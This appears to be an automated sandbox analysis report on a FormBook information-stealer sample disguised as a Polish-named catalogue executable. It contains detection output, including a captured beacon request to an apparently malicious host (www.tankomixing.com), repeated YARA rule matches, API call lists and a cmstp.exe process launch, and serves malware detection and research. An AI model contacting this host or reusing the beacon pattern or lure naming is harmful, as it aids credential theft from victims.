          Source: global trafficHTTP traffic detected: GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg== HTTP/1.1Host: www.tankomixing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: nowy przyk#U0142adowy katalog.exe, 00000000.00000002.362117708.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: nowy przyk#U0142adowy katalog.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00406354
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00404802
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_00406B2B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10004E3E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10003770
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000C461
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000AC82
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10009574
